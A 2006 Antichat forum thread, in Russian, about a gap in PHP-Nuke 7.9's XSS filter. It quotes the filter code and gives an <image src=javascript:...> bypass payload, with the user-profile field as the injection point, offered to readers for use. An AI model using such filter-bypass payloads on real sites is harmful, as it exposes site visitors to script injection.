Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   баг в PHP-Nuke 7.9 (https://forum.antichat.xyz/showthread.php?t=14914)

Dr0ne 23.02.2006 14:52
баг в PHP-Nuke 7.9
 
я просмотрел код нюки на русском на нашел брешь в проверке на XSS
PHP код:
if (!defined('ADMIN_FILE')) {      foreach ($_GET as $sec_key => $secvalue) {          if ((eregi("<[^>]*script*\"?[^>]*>"$secvalue)) ||          (eregi("<[^>]*object*\"?[^>]*>"$secvalue)) ||          (eregi("<[^>]*iframe*\"?[^>]*>"$secvalue)) ||          (eregi("<[^>]*applet*\"?[^>]*>"$secvalue)) ||          (eregi("<[^>]*meta*\"?[^>]*>"$secvalue)) ||          (eregi("<[^>]*style*\"?[^>]*>"$secvalue)) ||          (eregi("<[^>]*form*\"?[^>]*>"$secvalue)) ||          (eregi("<[^>]*img*\"?[^>]*>"$secvalue)) ||          (eregi("<[^>]*onmouseover*\"?[^>]*>"$secvalue)) ||          (eregi("\([^>]*\"?[^)]*\)"$secvalue)) ||          (eregi("\""$secvalue)) ||          (eregi("forum_admin"$sec_key)) ||          (eregi("inside_mod"$sec_key))) { 
тут нет проверки на тэг <image >
атаку можно провести так
Код HTML:
<image src=javascript:alert('ok')>
пользуйтесь. будут вопросы - обращайтесь

PinkPanther 24.02.2006 00:32
Цитата:
Сообщение от Dr0ne
я просмотрел код нюки на русском на нашел брешь в проверке на XSS
PHP код:
if (!defined('ADMIN_FILE')) {     foreach ($_GET as $sec_key => $secvalue) {         if ((eregi("<[^>]*script*\"?[^>]*>"$secvalue)) ||         (eregi("<[^>]*object*\"?[^>]*>"$secvalue)) ||         (eregi("<[^>]*iframe*\"?[^>]*>"$secvalue)) ||         (eregi("<[^>]*applet*\"?[^>]*>"$secvalue)) ||         (eregi("<[^>]*meta*\"?[^>]*>"$secvalue)) ||         (eregi("<[^>]*style*\"?[^>]*>"$secvalue)) ||         (eregi("<[^>]*form*\"?[^>]*>"$secvalue)) ||         (eregi("<[^>]*img*\"?[^>]*>"$secvalue)) ||         (eregi("<[^>]*onmouseover*\"?[^>]*>"$secvalue)) ||         (eregi("\([^>]*\"?[^)]*\)"$secvalue)) ||         (eregi("\""$secvalue)) ||         (eregi("forum_admin"$sec_key)) ||         (eregi("inside_mod"$sec_key))) { 
тут нет проверки на тэг <image >
атаку можно провести так
Код HTML:
<image src=javascript:alert('ok')>
пользуйтесь. будут вопросы - обращайтесь
RE конечно, но хотелось бы немного поподробнее....

Nova 24.02.2006 02:02
Мне тоже интересно стало.... раскажи подробней...

SanyaX 24.02.2006 10:37
А что тут подробней он ведь и так уже выложил уязвимость можно сказать.

Mobile 24.02.2006 13:36
Прикольно, держи +

grinay 24.02.2006 16:43
вопрос только в том где вводить а?

Dr0ne 24.02.2006 17:05
чтоб точно узнать пришлось денвер ставить)))
Ваш аккаунт - Персональная информация - Немного о себе:
=======================
кста я эту багу никому не показывал и никто о ней не знал


Время: 01:42